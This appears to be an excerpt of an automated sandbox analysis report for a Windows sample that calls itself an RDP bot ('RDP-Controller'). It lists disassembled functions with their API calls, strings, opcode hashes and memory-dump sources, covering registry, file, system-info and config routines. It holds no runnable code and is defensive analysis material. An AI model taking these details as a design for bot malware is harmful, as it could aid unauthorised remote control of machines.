                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                                                                                                  • API String ID: 1332880857-2775769510
                                                                                                                  • Opcode ID: 2e43f65ab222b3ac66c053e089489e39d10f0dabbf85cbb61c3ee8f9f1bd7b27
                                                                                                                  • Instruction ID: 9183f816bc45205f39f7f29d088fae7c37cd53967333936e462a44d9dbceecda
                                                                                                                  • Opcode Fuzzy Hash: 2e43f65ab222b3ac66c053e089489e39d10f0dabbf85cbb61c3ee8f9f1bd7b27
                                                                                                                  • Instruction Fuzzy Hash: CDB16E7290C58381FB24EF08A450BBDE651AF807B4F994133DD4E87690CEBEE995D322
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                  • API String ID: 1799206407-3397184676
                                                                                                                  • Opcode ID: 9c7336e4765d674d33b340bbc846356eab5d4be4d89593d70358537b7df881f0
                                                                                                                  • Instruction ID: b67de29e6a5779ffd9bbefc72acb81a79a4b1d255b4b907bf2dea69b38d8666b
                                                                                                                  • Opcode Fuzzy Hash: 9c7336e4765d674d33b340bbc846356eab5d4be4d89593d70358537b7df881f0
                                                                                                                  • Instruction Fuzzy Hash: 9B5118B0A0D6978AFB70FE05A550A7CE2507B117B8ED81133CD1F07A91AEEDA985D321
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMetricsSystem$fflushfwrite
                                                                                                                  • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$C:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                                                                                                  • API String ID: 144387239-450147120
                                                                                                                  • Opcode ID: fe720279f8c7f6c7139840da8b033ee7716de9ef5324ac21d572082e249eae40
                                                                                                                  • Instruction ID: 5b3697a30b3a235c2a3ca64217286a011321d28776be2fffc1c945588a655bf6
                                                                                                                  • Opcode Fuzzy Hash: fe720279f8c7f6c7139840da8b033ee7716de9ef5324ac21d572082e249eae40
                                                                                                                  • Instruction Fuzzy Hash: 00712B70A0C58381FB21FE59A524F7DA192AB147A8F904033ED0E4B2A5DEEDF990D361
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                  • API String ID: 2123903355-2019010457
                                                                                                                  • Opcode ID: 03568839cbc286dbeade8a1880738849ae21df82849d251337ce766ead38c4a3
                                                                                                                  • Instruction ID: eecbec56df98d55346e318d1daeec8a98ac3865226f042efcef86fa1fecfb2ef
                                                                                                                  • Opcode Fuzzy Hash: 03568839cbc286dbeade8a1880738849ae21df82849d251337ce766ead38c4a3
                                                                                                                  • Instruction Fuzzy Hash: 174154B5A082428AE750EF29E65096EF7A1FB587A4F800137DE1C83795EFBDE441C710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreate
                                                                                                                  • String ID: (key != NULL)$(root != NULL)$?$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                                                                                                  • API String ID: 2932200918-3746808683
                                                                                                                  • Opcode ID: c757dc4ad3dd0fc64ac37562a1262f6cb1cecffa34e926813ffbbe5d014ef5ac
                                                                                                                  • Instruction ID: 9eef1758e558862d24980df16347af5c497e3c20ef5f1d41d2edc85aaf63fe66
                                                                                                                  • Opcode Fuzzy Hash: c757dc4ad3dd0fc64ac37562a1262f6cb1cecffa34e926813ffbbe5d014ef5ac
                                                                                                                  • Instruction Fuzzy Hash: 715189B2E0C69291FBA0EF14A854ABDE260BF007B4FC44137CD4D576A0DFADA985D364
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                  • API String ID: 1318626975-3964590784
                                                                                                                  • Opcode ID: fa179d4c557b06b4e4781d2b4c9ac96fdb4b2f92b3d62cdd309cb42eab5bc487
                                                                                                                  • Instruction ID: de382366863e4257465f793cbbe0ff285a507511499835b41d51d1c1d8ef4a03
                                                                                                                  • Opcode Fuzzy Hash: fa179d4c557b06b4e4781d2b4c9ac96fdb4b2f92b3d62cdd309cb42eab5bc487
                                                                                                                  • Instruction Fuzzy Hash: 7F314C75A08A8789FB50AF21A910BBDA660AF507A8F844033DD4E47795DFBDE846C360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                  • API String ID: 365566950-3085771803
                                                                                                                  • Opcode ID: 58f23fa2416bd7a25debecb8366120f3225b44e788bd1bbcb70f401e2d99b19e
                                                                                                                  • Instruction ID: 15f149f342de735043aeb8437d0163b44cf5367734515083d3dc40b11fbb7174
                                                                                                                  • Opcode Fuzzy Hash: 58f23fa2416bd7a25debecb8366120f3225b44e788bd1bbcb70f401e2d99b19e
                                                                                                                  • Instruction Fuzzy Hash: 9D516B70A0C68ACEF760EF50A460ABDE650AF113A8F944133DD1F87794EEACE845C721
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Deletefflushfwrite
                                                                                                                  • String ID: (key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
                                                                                                                  • API String ID: 2939363742-1701293196
                                                                                                                  • Opcode ID: 1842f1961a00c6416b9b9875017d59ef9b338ca12cf8e6a2438a96b6c57708fa
                                                                                                                  • Instruction ID: 2285076ecc6dad6c77df3bb054083d2800b7d7a3e544b8dfbab9a30c9f234a31
                                                                                                                  • Opcode Fuzzy Hash: 1842f1961a00c6416b9b9875017d59ef9b338ca12cf8e6a2438a96b6c57708fa
                                                                                                                  • Instruction Fuzzy Hash: 514115B2D0C1A391FB24BE18A850ABCE2406F00774FC94133DD4E676A0DEADED9593A1
                                                                                                                  APIs
                                                                                                                  • UnlockFileEx.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6C9B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6CAC
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000157C50713D0,?,00007FF7C1AB1B41,?,?,00000000,00007FF7C1AB1E55), ref: 00007FF7C1AB6D62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                  • API String ID: 497672076-1436771859
                                                                                                                  • Opcode ID: 5f7bac4c167d1b71eca64439f564aec4648d61132f1d68ca14babe0d5e14d78c
                                                                                                                  • Instruction ID: a77f8bf7d8d866bd8def64c002f64adee8b2d4d3dee066d425b99f9c2c5cd74a
                                                                                                                  • Opcode Fuzzy Hash: 5f7bac4c167d1b71eca64439f564aec4648d61132f1d68ca14babe0d5e14d78c
                                                                                                                  • Instruction Fuzzy Hash: 20410BB2B0C98380FB24EF15E450EBCA7516B507B8FD40233DD1D176E49EADA58AD721
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorGlobalLastMemoryStatus
                                                                                                                  • String ID: $(mi != NULL)$;$C:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                                                                                                                  • API String ID: 3848946878-3004215591
                                                                                                                  • Opcode ID: 7eed2eaf22c4293db66055f8990370d3c67f6fe97e497cdea4d91ffcfe9a506c
                                                                                                                  • Instruction ID: 2ddd3c46c05fbd29cd373589e8b007b16b6a867e3fcde02c4ad70c21da09398e
                                                                                                                  • Opcode Fuzzy Hash: 7eed2eaf22c4293db66055f8990370d3c67f6fe97e497cdea4d91ffcfe9a506c
                                                                                                                  • Instruction Fuzzy Hash: C631E061E1C68382FB28EF149594BBD92609F54324E905633C90E07693DEDEB9C6D221
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF7C1AB75AF,?,?,?,?,?,00000157C50713D0,00007FF7C1AB76AA), ref: 00007FF7C1AB747B
                                                                                                                  • GetLastError.KERNEL32(?,?,00000104,?,00000104,RDP-Controller.lock,00007FF7C1AB75AF,?,?,?,?,?,00000157C50713D0,00007FF7C1AB76AA), ref: 00007FF7C1AB7486
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$RDP-Controller.lock$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                                                                                                                  • API String ID: 2776309574-624244044
                                                                                                                  • Opcode ID: b356d9d339ff3bce16533a7ec599c8f5233e65cd9eb1d3b1fa64c6b1b99d23ed
                                                                                                                  • Instruction ID: 3df286c6bedf2c9433e34a6d3a23cf6663caca5f1f470ed3257ae70fe2548a24
                                                                                                                  • Opcode Fuzzy Hash: b356d9d339ff3bce16533a7ec599c8f5233e65cd9eb1d3b1fa64c6b1b99d23ed
                                                                                                                  • Instruction Fuzzy Hash: 89313971A08A8785FB10EF95E820FBCA650AF107A8FC45133DD0D17795EEEEA909C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                  • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                  • API String ID: 3555958901-1687387729
                                                                                                                  • Opcode ID: 52b29fbd4fff55175774032e9108d3912dfcd6ade1272cc7db0221750685e0b2
                                                                                                                  • Instruction ID: 65fb814c140807d7e8fd12b0057a9f60145f1af21c2049e86ac69befad89cd71
                                                                                                                  • Opcode Fuzzy Hash: 52b29fbd4fff55175774032e9108d3912dfcd6ade1272cc7db0221750685e0b2
                                                                                                                  • Instruction Fuzzy Hash: 13613B31D0D59282FB60EE14A558B7CD2519F00378FA90633CC1F9B2E5DEADBC869661
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                  • API String ID: 2291555494-3647951244
                                                                                                                  • Opcode ID: c80f473890539df45e4c0d59242f093770392ccd82f549712a2b1bf366d56230
                                                                                                                  • Instruction ID: 42c45fdd387d680414d2c84a106a2f8561e47becadf6fe6fa078b2a0d042078a
                                                                                                                  • Opcode Fuzzy Hash: c80f473890539df45e4c0d59242f093770392ccd82f549712a2b1bf366d56230
                                                                                                                  • Instruction Fuzzy Hash: 1A5160B1E0C29282FB61AF509554F7DD250AF007B8F984633DD1D4B7E0EEADA8868361
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$strtol
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                  • API String ID: 3596500743-1991603811
                                                                                                                  • Opcode ID: 79175df2b687a8a8d7f1141da658f3e1b7b0606fc6674cf03db3b69883c99b44
                                                                                                                  • Instruction ID: b846ce74aa17c2909bbcd4270157696ad90c3f78d0b138c9cd278df54b76b71b
                                                                                                                  • Opcode Fuzzy Hash: 79175df2b687a8a8d7f1141da658f3e1b7b0606fc6674cf03db3b69883c99b44
                                                                                                                  • Instruction Fuzzy Hash: 43217E31A0868391E710EF56A850BAEB720BF857A4F804133DE4C07764DFBDE886D720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                  • Opcode ID: 7d68ca7b8cc9e4de448433a8525fc56b3e75110361bbb132b1ea392003ac8ac3
